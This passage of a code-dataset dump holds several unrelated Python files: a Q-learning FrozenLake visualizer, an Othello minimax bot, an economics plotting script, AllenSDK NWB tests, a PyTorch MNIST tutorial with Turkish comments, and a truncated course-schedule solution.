lr)\nprint(\"Epsilon :\", epsilon)\n\n#%% TEST SOLUTION ON FROZEN LAKE\nprint(\"\\nPlay Game on 100 episodes...\")\n\navg_r = 0\nfor i in range(100):\n s = env.reset()\n done = False\n\n while not done:\n a = np.argmax(Q[s])\n newS, r, done, _ = env.step(a)\n s = newS\n\n avg_r += r/100.\n\nprint(\"Number of successes out of 100 episodes :\", np.round(avg_r*100))\n\n\n#%% CREATE GRAPHICS AND MOVIES\n# 1) Video of the path that is generated on selected iterations\n# 2) Graph of Epsilon vs Iteration\n# 3) Video of the evolution of the Q-Dictionary\n\nprint(\"\")\nprint('Generating Visuals...')\n\n# 1 - Path Video\n#create figure\nplt.figure(1)\nfig1, ax1 = plt.subplots()\nax1.xaxis.set_ticks([])\nax1.yaxis.set_ticks([])\n#create lake background\nplt.xlim(0,ncol)\nplt.ylim(0,nrow)\nplt.axis('square')\ncolormap = ListedColormap(['g','b','c','y'])\nc = ax1.pcolor(np.linspace(0,ncol,ncol+1),np.linspace(0,nrow,nrow+1),list(lake[::-1]),cmap=colormap,alpha=0.4) \n\n#place points on lake to generate variables to call in animation\n# each data set (the line and the final point) have a separate name\nx, y = robotloc(moves,0.5,nrow-.5)\nline, = ax1.plot(x[0],y[0],'ko-')\npoint, = ax1.plot(x[0],y[0],'r*',markersize=15)\nplt.title('Episode 0')\n\n#Reset the counter variables for the animation function.\n# for some reason if j isn't reset, it can get buggy\nj=0\nk=0\n#Create and save Visual #1 (Path video)\nani = animation.FuncAnimation(fig1, animatepath, interval=1, save_count=len(x))\n\nplt.rcParams['animation.ffmpeg_path'] ='C:\\\\Program Files\\\\Python\\\\ffmpeg-20200713-7772666-win64-static\\\\bin\\\\ffmpeg.exe'\nFFwriter=animation.FFMpegWriter(fps=10, extra_args=['-vcodec', 'libx264'])\nani.save(fn_path, writer=FFwriter)\n\nplt.show()\n\n############################################################################\n\n#Create plot of epsilon vs iteration\nfig2 = plt.figure(2)\nplt.plot(np.linspace(1,len(epsplot),len(epsplot)),epsplot)\nplt.plot([1,len(epsplot)],[epsilonMin,epsilonMin],'r--')\nplt.title('Epsilon Value')\nplt.xlabel('Episode')\nplt.ylabel('Epsilon')\nplt.legend(['Epsilon','Threshold'])\n\nplt.savefig(figdir_eps)\n\nplt.show()\n\n#############################################################################\n#Create evolving Q-dictionary heatmap\nplt.figure(3) #new figure\nfig3, ax3 = plt.subplots(figsize=(11, 9)) #needs to be a subplot to call the axis\n\nvmax = np.ceil(np.max(Qval)*100)/100 #max value in Qval for upper limit of heatmap color scale\nvmin = np.ceil(np.min(Qval)*100)/100 #min value in Qval for upper limit of heatmap color scale\nvmax = max([abs(vmax),abs(vmin)]) #center the vmax and vmin values so 0=white tile\nvmin = -vmax\ncmap = seaborn.diverging_palette(10, 220, sep=80, as_cmap=True) #define diverging colormap\n#cmap = seaborn.light_palette((210, 90, 60), input=\"husl\", as_cmap=True) #define colormap (not diverging)\nVal_reshaped = np.reshape(Qval[0,:],(nrow,ncol)) #reshape values from Qval into array the size of the lake\n#draw the heatmap\np = seaborn.heatmap(Val_reshaped, cmap=cmap, vmin=vmin, vmax=vmax,\n square=True, xticklabels=ncol+1, yticklabels=nrow+1,\n linewidths=.5, cbar_kws={\"shrink\": .5}, ax=ax3, annot=True, fmt=\".3f\")\n#Add labels to each point on lake (start, hole, frozen, goal)\nfor i in range(len(lake)):\n for ii in range(len(lake[0])):\n plt.text(i+0.4,ii+0.2,custom_map[ii][i],fontsize=14)\n \n#Reset the counter variables for the animation function.\n# for some reason if j isn't reset, it can get buggy \nj=0\nk=0\n#Create and save Visual #3 
(Heatmap video)\nani = animation.FuncAnimation(fig3, animateheatmap, interval=1, save_count=len(Qit))\n\nplt.rcParams['animation.ffmpeg_path'] ='C:\\\\Program Files\\\\Python\\\\ffmpeg-20200713-7772666-win64-static\\\\bin\\\\ffmpeg.exe'\nFFwriter=animation.FFMpegWriter(fps=24, extra_args=['-vcodec', 'libx264'])\nani.save(fn_heatmap, writer=FFwriter)\n\nplt.show()\n\nprint('Done')\n\n#Automatically open visualization files\n# startfile(viddir_path)\n# startfile(figdir_eps)\n# startfile(viddir_hm)","repo_name":"Cbiswadeep/ECE-6254-Project","sub_path":"Q_Learning.py","file_name":"Q_Learning.py","file_ext":"py","file_size_in_byte":13603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28554181816","text":"\n\"\"\"\n===================================================================================\nName: computer_player.py\nAuthor: Madi Sanchez-Forman\nVersion: 5.10.23\nDecription: This script builds a bot to play Othello using minimax with alpha-beta\npruning. Heuristic approach is based off of evaluation proposed in:\nhttps://courses.cs.washington.edu/courses/cse573/04au/Project/mini1/RUSSIA/Final_Paper.pdf\nwith some slight changes. \n===================================================================================\n\"\"\"\nfrom board import Board\nimport math\n\n#******************* Constants ***************************#\nSTATIC_WEIGHTS = [ #These are the weights of each spot on the board. The numbers are as described in the paper linked above\n [20, -3, 11, 8, 8, 11, -3, 20],\n [-3, -7, -4, 1, 1, -4, -7, -3],\n [11, -4, 2, 2, 2, 2, -4, 11],\n [8, 1, 2, -3, -3, 2, 1, 8],\n [8, 1, 2, -3, -3, 2, 1, 8],\n [11, -4, 2, 2, 2, 2, -4, 11],\n [-3, -7, -4, 1, 1, -4, -7, -3],\n [20, -3, 11, 8, 8, 11, -3, 20]\n]\nSIZE = 8 #size of board\nEMPTY, BLACK, WHITE = '.', '*', 'o' #tiles\n\n#******************* Computer Player class ***************************#\nclass Computer_Player:\n def __init__(self, max_id, difficulty_level):\n \"\"\"\n Initalizes an instance of Computer Player. 
It takes the ID of the AI and the number of plies to look ahead during MiniMax\n        \"\"\"\n        assert max_id in ('B', 'W') #class must use an id that is either 'B' or 'W'\n        assert difficulty_level > 0\n        self.difficulty = difficulty_level #number of plies to look ahead\n        self.max_id = max_id \n        if self.max_id == 'B':\n            self.min_id = 'W' #storing the id of the other player\n            self.TILES_TO_COLOR = {self.max_id: BLACK, self.min_id: WHITE} #maps id -> tile\n        else:\n            self.min_id = 'B'\n            self.TILES_TO_COLOR = {self.max_id: WHITE, self.min_id: BLACK}\n\n    def pick_move(self, board):\n        \"\"\"\n        Pick_move() calls Minimax on the different possible moves and then finds the one with the highest score.\n        After the best move is found, it uses the Board class to flip the tiles\n        Params: instance of board class\n        Returns: None\n        \"\"\"\n        possible_moves = board.all_legal_moves(self.max_id) #get all legal moves for our ID\n        best_val = -math.inf\n        best_x, best_y = 0, 0\n        best_tiles = []\n        for x,y in possible_moves: #for each move\n            tiles_flipped = board.find_tiles_taken(x, y, self.TILES_TO_COLOR[self.max_id]) #find tiles that will flip\n            board.flip_tiles(tiles_flipped, self.max_id) #apply the move before scoring it\n            move_score = self.minimax_AB(board, self.difficulty - 1, self.min_id, -math.inf, math.inf) #score the resulting board\n            board.undo_move(tiles_flipped, self.max_id) #restore the board before trying the next move\n            if move_score > best_val: #remember move with best score\n                best_x, best_y = x, y\n                best_val = move_score\n                best_tiles = tiles_flipped\n        board.flip_tiles(best_tiles, self.max_id) #flip tiles for that move\n        print(\"Computer chose: \" + \"[\" + str(best_x + 1) + \",\" + str(best_y + 1) + \"]\") #print move chosen for clarity\n\n    def minimax_AB(self, board, depth, cur_id, alpha, beta):\n        \"\"\"\n        minimax_AB() performs the depth first tree search on an instance of a board for a given number of plies. \n        params: Instance of board, depth of recursion, ID of current player, alpha and beta values\n        returns: best_score -> score of the board\n        \"\"\"\n        if depth == 0 or board.is_terminal(): #if the search depth is exhausted or the game is over\n            return self.heuristic_score(board, cur_id) #return heuristic value of the board\n        if cur_id == self.max_id: #if maximizing\n            best_score = -math.inf\n            possible_moves = board.all_legal_moves(cur_id) #find all possible moves\n            if not possible_moves: #python idiom for checking if a list is empty\n                best_score = self.minimax_AB(board, depth, self.min_id, alpha, beta) #if there are no possible moves, minimizing player goes twice\n            for x, y in possible_moves: #for each move\n                tiles = board.find_tiles_taken(x, y, self.TILES_TO_COLOR[self.max_id]) #find and flip the tiles on the board without making copy\n                board.flip_tiles(tiles, self.max_id)\n                score = self.minimax_AB(board, depth - 1, self.min_id, alpha, beta) #score the board\n                best_score = max(best_score, score) \n                alpha = max(alpha, score)\n                board.undo_move(tiles, self.max_id) #replace tiles\n                if beta <= alpha: #if it is not better than anything we have seen -> prune\n                    break\n        else:\n            best_score = math.inf #inverse of above for min player\n            possible_moves = board.all_legal_moves(self.min_id)\n            if not possible_moves:\n                best_score = self.minimax_AB(board, depth, self.max_id, alpha, beta)\n            for x, y in possible_moves:\n                tiles = board.find_tiles_taken(x, y, self.TILES_TO_COLOR[self.min_id])\n                board.flip_tiles(tiles, self.min_id)\n                score = self.minimax_AB(board, depth - 1, self.max_id, alpha, beta)\n                best_score = min(best_score, score)\n                beta = min(beta, score)\n                board.undo_move(tiles, self.min_id)\n                if beta <= alpha:\n                    break\n        return best_score\n    \n    def heuristic_score(self, board, cur_id):\n        \"\"\"\n        Heuristic_score() 
calculates the heuristic value of the board\n Params: an instance of Board class, and the id of current player.\n returns: Float score of board\n \"\"\"\n #NOTE: Instead of using a function to check for corner spots and edges, I used the static weights of the board as proposed in the essay, I wanted a mix of a dynamic and static heuristic\n score = 0\n score += self.coin_parity(board) \n score += self.mobility_score(board) \n score += self.static_score(board, cur_id)\n return score\n \n def coin_parity(self, board):\n \"\"\"\n Coin_parity compares the number of max and mins tiles, except it aims to minimize its own tiles and maximize the opponents during the beginning of the game.\n When the game is closer to the end, it will switch to maximizing its tiles. \n params: instance of Board class\n returns: float coin parity score of board \n \"\"\"\n score = board.get_score()\n max_coins, min_coins = score[self.max_id], score[self.min_id]\n if not board.is_end_game(): #if it is not the end of the game => minimize tiles\n return -10 * (max_coins - min_coins) / (max_coins + min_coins)\n else:\n return 10 * (max_coins - min_coins) / (max_coins + min_coins) #otherwise we want to maximize them\n \n def mobility_score(self, board):\n \"\"\"\n Mobily_score aims to estimate the future mobility (number of possible future moves) for each player, so that max can attempt to restrict the opponents mobility while\n maximizing their own.\n params: instance of Board class\n returns: float mobility score of board\n \"\"\"\n max_moves, min_moves = len(board.all_legal_moves(self.max_id)), len(board.all_legal_moves(self.min_id))\n if max_moves > 0 and min_moves == 0: #want to favor bot getting two turns in a row, so if possible make note of that\n return 30\n elif max_moves == 0 and min_moves > 0: #do not want bot to give opponent two turns in a row\n return -30\n elif max_moves + min_moves == 0:\n return 0\n else:\n return 10 * (max_moves - min_moves) / (max_moves + min_moves)\n\n def static_score(self, board, cur_id):\n \"\"\"\n Static score uses the static weights array to score the board, favoring corner positions. 
\n params: instance of board class and id of current player\n returns: integer score of board\n \"\"\"\n score = 0\n for x in range(SIZE):\n for y in range(SIZE):\n if board.array[x][y] == cur_id:\n score += STATIC_WEIGHTS[x][y]\n return score","repo_name":"madiforman/reversi","sub_path":"computer_player.py","file_name":"computer_player.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75210779683","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport wandb\nfrom mpl_toolkits.axes_grid1.inset_locator import (\n zoomed_inset_axes,\n mark_inset,\n inset_axes,\n)\nfrom utilities import get_results_by_tag, plot_params\n\noutput_dir = \"./figures\"\nplot_name = \"growth_sequential_g0_one_run\"\noutput_path = output_dir + \"/\" + plot_name + \".pdf\"\ntag = \"growth_sequential_g0_one_run\"\napi = wandb.Api()\nproject = \"highdimensionaleconlab/deep_learning_transversality\"\nparams = plot_params((10, 4.5))\n\n# artifact and config\nresults = get_results_by_tag(api, project, tag, get_test_results=True, max_runs=1)\nassert results.id.nunique() == 1\nparameters = get_results_by_tag(api, project, tag, get_config=True, max_runs=1)\nmax_T_test = int(parameters[\"test_T\"])\nmax_T = int(parameters[\"train_t_max\"]) + 1\n\n\nk_sol = results[\"k_t_sol\"]\nc_sol = results[\"c_t_sol\"]\nk_0 = results[\"k_t_approx\"]\nc_0 = results[\"c_t_approx\"]\nk_0_error = results[\"k_rel_error\"]\nc_0_error = results[\"c_rel_error\"]\n\nt = np.array(range(0, max_T_test))\n\n\nplt.rcParams.update(params)\n\nax_ck = plt.subplot(121)\nplt.plot(k_sol, \"black\", linestyle=\"dashed\", label=r\"$k(t)$\")\nplt.plot(k_0, \"black\", label=r\"$\\hat{k}(t)$\")\nplt.plot(c_sol, \"blue\", linestyle=\"dashed\", label=r\"$c(t)$\")\nplt.plot(c_0, \"blue\", label=r\"$\\hat{c}(t)$\")\nplt.axvline(x=max_T - 1, color=\"0.0\", linestyle=\"dashed\")\nylim_min = 0.5 * np.amin(np.minimum(c_sol, c_0))\nylim_max = 1.2 * np.amax(np.maximum(k_sol, k_0))\nplt.ylim([ylim_min, ylim_max])\nhandles, labels = plt.gca().get_legend_handles_labels()\nby_label = dict(zip(labels, handles))\nplt.legend(by_label.values(), by_label.keys(), prop={\"size\": params[\"font.size\"]})\nplt.title(r\"Capital and Consumption: $\\hat{k}(t)$ and $\\hat{c}(t)$\")\nplt.xlabel(r\"Time($t$)\")\nplt.legend(loc=\"lower right\")\n\n\nax_errors = plt.subplot(122, sharex=ax_ck)\nplt.plot(t, k_0_error, \"black\", label=r\"$\\varepsilon_k(t)$\")\nplt.plot(t, c_0_error, \"blue\", label=r\"$\\varepsilon_c(t)$\")\nplt.title(r\"Relative errors: $\\varepsilon_k(t)$ and $\\varepsilon_c(t)$\")\nplt.axvline(x=max_T - 1, color=\"0.0\", linestyle=\"dashed\")\nplt.xlabel(r\"Time($t$)\")\nplt.tight_layout()\n\n\ntime_window = [18, 23]\nave_value = 0.5 * (k_sol[time_window[0]] + k_sol[time_window[1]])\nwindow_width = 0.015 * ave_value\nmatplotlib.rcParams.update({\"ytick.labelsize\": 8})\n\naxins = zoomed_inset_axes(\n ax_ck,\n 4,\n loc=\"upper center\",\n bbox_to_anchor=(0.5, 0.7, -0.3, 0.3),\n bbox_transform=ax_ck.transAxes,\n)\naxins.plot(k_sol, \"black\", linestyle=\"dashed\")\naxins.plot(k_0, \"black\")\n\nplt.axvline(x=max_T, color=\"0.0\", linestyle=\"dashed\")\nx1, x2, y1, y2 = (\n time_window[0],\n time_window[1],\n ave_value - window_width,\n ave_value + window_width,\n)\naxins.set_xlim(x1, x2)\naxins.set_ylim(y1, y2)\naxins.xaxis.tick_top()\nplt.xticks(fontsize=8, visible=False)\nplt.tick_params(axis=\"x\", which=\"both\", 
bottom=False, top=False, labelbottom=False)\nplt.yticks(fontsize=8)\nmark_inset(ax_ck, axins, loc1=1, loc2=3, linewidth=\"0.7\", ls=\"--\", ec=\"0.5\")\n\nplt.savefig(output_path)\n","repo_name":"HighDimensionalEconLab/transversality","sub_path":"generate_figures/growth_sequential_g0_one_run.py","file_name":"growth_sequential_g0_one_run.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8240444978","text":"import math\n\nimport numpy as np\nimport pandas as pd\nimport pynwb\nimport pytest\n\nimport allensdk.brain_observatory.nwb as nwb\nfrom allensdk.brain_observatory.behavior.session_apis.data_io import (\n BehaviorNwbApi)\nfrom allensdk.brain_observatory.behavior.stimulus_processing import \\\n StimulusTemplate, get_stimulus_templates\n\n\n# pytest fixtures:\n# nwbfile: test.brain_observatory.conftest\n# roundtripper: test.brain_observatory.conftest\n# running_speed: test.brain_observatory.conftest\n# running_acquisition_df_fixture: test.brain_observatory.behavior.conftest\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_running_acquisition_to_nwbfile(nwbfile, roundtrip, roundtripper,\n running_acquisition_df_fixture):\n nwbfile = nwb.add_running_acquisition_to_nwbfile(\n nwbfile, running_acquisition_df_fixture)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n obt_running_acq_df = obt.get_running_acquisition_df()\n\n pd.testing.assert_frame_equal(running_acquisition_df_fixture,\n obt_running_acq_df,\n check_like=True)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_running_speed_to_nwbfile(nwbfile, running_speed,\n roundtrip, roundtripper):\n\n nwbfile = nwb.add_running_speed_to_nwbfile(nwbfile, running_speed)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n obt_running_speed = obt.get_running_speed()\n\n assert np.allclose(running_speed.timestamps,\n obt_running_speed['timestamps'])\n assert np.allclose(running_speed.values,\n obt_running_speed['speed'])\n\n\n@pytest.mark.parametrize('roundtrip,behavior_stimuli_data_fixture',\n [(True, {}), (False, {})],\n indirect=[\"behavior_stimuli_data_fixture\"])\ndef test_add_stimulus_templates(nwbfile, behavior_stimuli_data_fixture,\n roundtrip, roundtripper):\n stimulus_templates = get_stimulus_templates(behavior_stimuli_data_fixture,\n grating_images_dict={})\n\n nwb.add_stimulus_template(nwbfile, stimulus_templates)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n stimulus_templates_obt = obt.get_stimulus_templates()\n\n assert stimulus_templates_obt == stimulus_templates\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_stimulus_presentations(nwbfile, stimulus_presentations_behavior,\n stimulus_timestamps, roundtrip,\n roundtripper,\n stimulus_templates: StimulusTemplate):\n nwb.add_stimulus_timestamps(nwbfile, stimulus_timestamps)\n nwb.add_stimulus_presentations(nwbfile, stimulus_presentations_behavior)\n nwb.add_stimulus_template(nwbfile=nwbfile,\n stimulus_template=stimulus_templates)\n\n # Add index for this template to NWB in-memory object:\n nwb_template = nwbfile.stimulus_template[stimulus_templates.image_set_name]\n compare = (stimulus_presentations_behavior['image_set'] ==\n nwb_template.name)\n curr_stimulus_index = 
stimulus_presentations_behavior[compare]\n nwb.add_stimulus_index(nwbfile, curr_stimulus_index, nwb_template)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(stimulus_presentations_behavior,\n obt.get_stimulus_presentations(),\n check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_stimulus_timestamps(nwbfile, stimulus_timestamps,\n roundtrip, roundtripper):\n\n nwb.add_stimulus_timestamps(nwbfile, stimulus_timestamps)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n np.testing.assert_array_almost_equal(stimulus_timestamps,\n obt.get_stimulus_timestamps())\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_trials(nwbfile, roundtrip, roundtripper, trials):\n\n nwb.add_trials(nwbfile, trials, {})\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(trials, obt.get_trials(), check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_licks(nwbfile, roundtrip, roundtripper, licks):\n\n nwb.add_licks(nwbfile, licks)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(licks, obt.get_licks(), check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_rewards(nwbfile, roundtrip, roundtripper, rewards):\n\n nwb.add_rewards(nwbfile, rewards)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(rewards, obt.get_rewards(),\n check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_behavior_only_metadata(roundtrip, roundtripper,\n behavior_only_metadata_fixture):\n\n metadata = behavior_only_metadata_fixture\n nwbfile = pynwb.NWBFile(\n session_description='asession',\n identifier='afile',\n session_start_time=metadata['date_of_acquisition']\n )\n nwb.add_metadata(nwbfile, metadata, behavior_only=True)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n metadata_obt = obt.get_metadata()\n\n assert len(metadata_obt) == len(metadata)\n for key, val in metadata.items():\n assert val == metadata_obt[key]\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_task_parameters(nwbfile, roundtrip,\n roundtripper, task_parameters):\n\n nwb.add_task_parameters(nwbfile, task_parameters)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n task_parameters_obt = obt.get_task_parameters()\n\n assert len(task_parameters_obt) == len(task_parameters)\n for key, val in task_parameters.items():\n if key == 'omitted_flash_fraction':\n if math.isnan(val):\n assert math.isnan(task_parameters_obt[key])\n if math.isnan(task_parameters_obt[key]):\n assert math.isnan(val)\n else:\n assert val == task_parameters_obt[key]\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_task_parameters_stim_nan(nwbfile, roundtrip,\n roundtripper,\n task_parameters_nan_stimulus_duration):\n \"\"\"\n Same as test_add_task_parameters, but stimulus_duration_sec is NaN\n \"\"\"\n task_params = task_parameters_nan_stimulus_duration\n nwb.add_task_parameters(nwbfile, 
task_params)\n\n    if roundtrip:\n        obt = roundtripper(nwbfile, BehaviorNwbApi)\n    else:\n        obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n    task_parameters_obt = obt.get_task_parameters()\n\n    assert len(task_parameters_obt) == len(task_params)\n    for key, val in task_params.items():\n        if key in ('omitted_flash_fraction',\n                   'stimulus_duration_sec'):\n            if math.isnan(val):\n                assert math.isnan(task_parameters_obt[key])\n            if math.isnan(task_parameters_obt[key]):\n                assert math.isnan(val)\n        else:\n            assert val == task_parameters_obt[key]\n","repo_name":"kencan7749/AllenSDK","sub_path":"allensdk/test/brain_observatory/behavior/test_write_behavior_nwb.py","file_name":"test_write_behavior_nwb.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"32446606531","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 19 14:18:31 2021\r\n\r\n@author: VolkanKarakuş\r\n\"\"\"\r\n\r\n# adding a hidden layer to logistic regression gives us an ANN model.\r\n\r\n# LogisticRegression was fine for classification, but it is no longer enough once the complexity of the dataset increases.\r\n# For that we need to increase the complexity of our model, i.e. NON-LINEARITY\r\n    # And for that we need to add hidden layers.\r\n    \r\n#%% Import Libraries\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable # for gradient computation\r\nfrom torch.utils.data import DataLoader #makes the train and test datasets usable by pytorch\r\n\r\n#%% Prepare Dataset\r\n# load data\r\ntrain = pd.read_csv('train.csv',dtype = np.float32)\r\n\r\n# split data into features(pixels) and labels(numbers from 0 to 9)\r\ntargets_numpy = train.label.values # these are the class labels (targets)\r\nfeatures_numpy = train.loc[:,train.columns != \"label\"].values/255 # normalization\r\n\r\n# train test split. Size of train data is 80% and size of test data is 20%. \r\nfeatures_train, features_test, targets_train, targets_test = train_test_split(features_numpy,\r\n                                                                             targets_numpy,\r\n                                                                             test_size = 0.2,\r\n                                                                             random_state = 42) \r\n\r\n# create feature and targets tensor for train set. As you remember we need variable to accumulate gradients. 
Therefore first we create tensor, then we will create variable\r\nfeaturesTrain = torch.from_numpy(features_train) # converted from numpy to Tensor\r\ntargetsTrain = torch.from_numpy(targets_train).type(torch.LongTensor) # data type is long\r\n\r\n# create feature and targets tensor for test set.\r\nfeaturesTest = torch.from_numpy(features_test)\r\ntargetsTest = torch.from_numpy(targets_test).type(torch.LongTensor) # data type is long\r\n\r\n# batch_size, epoch and iteration\r\n\"\"\"\r\nbatch_size is how many chunks we split our training data into.\r\n    If we split a training set of 1000 elements into 10 groups, each group contains 100 elements. batch_size=100\r\n    \r\nepoch is how many times the model is trained. epoch=5 means I will train on the same dataset 5 times.\r\n    We should keep training until the loss stops decreasing.\r\n\"\"\"\r\nbatch_size = 100\r\nn_iters = 10000\r\nnum_epochs = n_iters / (len(features_train) / batch_size) # num_epochs = n_iters / number_of_batches\r\nnum_epochs = int(num_epochs)\r\n\r\n# Pytorch train and test sets\r\ntrain = torch.utils.data.TensorDataset(featuresTrain,targetsTrain) # turns our dataset into a tensor dataset\r\ntest = torch.utils.data.TensorDataset(featuresTest,targetsTest) #\r\n\r\n# data loader (combines the dataset with a sampler and enables multiprocess loading, which speeds up the process)\r\ntrain_loader = DataLoader(train, batch_size = batch_size, shuffle = False)\r\ntest_loader = DataLoader(test, batch_size = batch_size, shuffle = False)\r\n\r\n# visualize one of the images in data set\r\nplt.imshow(features_numpy[10].reshape(28,28))\r\nplt.axis(\"off\")\r\nplt.title(str(targets_numpy[10]))\r\nplt.savefig('graph.png')\r\nplt.show()\r\n#%% Create ANN Model\r\nclass ANNModel(nn.Module):\r\n    \r\n    def __init__(self, input_dim, hidden_dim, output_dim):\r\n        super(ANNModel, self).__init__()\r\n        \r\n        # Linear function 1: 784 --> 150\r\n        self.fc1 = nn.Linear(input_dim, hidden_dim) \r\n        # Non-linearity 1\r\n        self.relu1 = nn.ReLU()\r\n        \r\n        # Linear function 2: 150 --> 150\r\n        self.fc2 = nn.Linear(hidden_dim, hidden_dim)\r\n        # Non-linearity 2\r\n        self.tanh2 = nn.Tanh()\r\n        \r\n        # Linear function 3: 150 --> 150\r\n        self.fc3 = nn.Linear(hidden_dim, hidden_dim)\r\n        # Non-linearity 3\r\n        self.elu3 = nn.ELU()\r\n        \r\n        # Linear function 4 (readout): 150 --> 10\r\n        self.fc4 = nn.Linear(hidden_dim, output_dim) \r\n    \r\n    def forward(self, x):\r\n        # Linear function 1\r\n        out = self.fc1(x)\r\n        # Non-linearity 1\r\n        out = self.relu1(out)\r\n        \r\n        # Linear function 2\r\n        out = self.fc2(out)\r\n        # Non-linearity 2\r\n        out = self.tanh2(out)\r\n        \r\n        # Linear function 3\r\n        out = self.fc3(out)\r\n        # Non-linearity 3\r\n        out = self.elu3(out)\r\n        \r\n        # Linear function 4 (readout)\r\n        out = self.fc4(out)\r\n        return out\r\n\r\n# instantiate ANN\r\ninput_dim = 28*28\r\nhidden_dim = 150 #hidden layer dim is one of the hyperparameters and it should be chosen and tuned. 
For now I just use 150; there is no particular reason.\r\noutput_dim = 10\r\n\r\n# Create ANN\r\nmodel = ANNModel(input_dim, hidden_dim, output_dim)\r\n\r\n# Cross Entropy Loss \r\nerror = nn.CrossEntropyLoss() # we would normally add a softmax layer above, but it is already included in CrossEntropyLoss, so we did not add one.\r\n\r\n#%% SGD Optimizer\r\nlearning_rate = 0.02\r\noptimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\r\n \r\n# ANN model training\r\ncount = 0\r\nloss_list = []\r\niteration_list = []\r\naccuracy_list = []\r\nfor epoch in range(num_epochs):\r\n    for i, (images, labels) in enumerate(train_loader):\r\n\r\n        train = Variable(images.view(-1, 28*28))\r\n        labels = Variable(labels)\r\n        \r\n        # Clear gradients\r\n        optimizer.zero_grad()\r\n        \r\n        # Forward propagation\r\n        outputs = model(train)\r\n        \r\n        # Calculate softmax and cross entropy loss\r\n        loss = error(outputs, labels)\r\n        \r\n        # Calculating gradients\r\n        loss.backward()\r\n        \r\n        # Update parameters\r\n        optimizer.step()\r\n        \r\n        count += 1\r\n        \r\n        if count % 50 == 0:\r\n            # Calculate Accuracy         \r\n            correct = 0\r\n            total = 0\r\n            # Predict test dataset\r\n            for images, labels in test_loader:\r\n\r\n                test = Variable(images.view(-1, 28*28))\r\n                \r\n                # Forward propagation\r\n                outputs = model(test)\r\n                \r\n                # Get predictions from the maximum value\r\n                predicted = torch.max(outputs.data, 1)[1]\r\n                \r\n                # Total number of labels\r\n                total += len(labels)\r\n\r\n                # Total correct predictions\r\n                correct += (predicted == labels).sum()\r\n            \r\n            accuracy = 100 * correct / float(total)\r\n            \r\n            # store loss and iteration\r\n            loss_list.append(loss.data)\r\n            iteration_list.append(count)\r\n            accuracy_list.append(accuracy)\r\n            if count % 500 == 0:\r\n                # Print Loss\r\n                print('Iteration: {} Loss: {} Accuracy: {} %'.format(count, loss.data, accuracy))\r\n    \r\n","repo_name":"volkaankarakus/pytorch","sub_path":"ANN/pytorchANN.py","file_name":"pytorchANN.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29807178526","text":"import collections\nfrom typing import List\n\nclass Solution:\n    \"\"\"\n    Determine whether it is possible to finish all the courses. Return true if you can, otherwise return false.\n    \"\"\"\n    def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:\n        indegree = [0 for _ in range(numCourses)]\n        edge = {i:[] for i in range(numCourses)}\n        res = 0\n\n        for cur, pre in prerequisites:\n            indegree[cur] += 1\n            edge[pre].append(cur)\n\n        queue = collections.deque(i for i in range(numCourses) if indegree[i] == 0)\n\n        while queue:\n            course = queue.pop()\n            res += 1\n            for i in edge[course]:\n                indegree[i] -= 1\n                if indegree[i] == 0:\n                    queue.append(i)\n\n        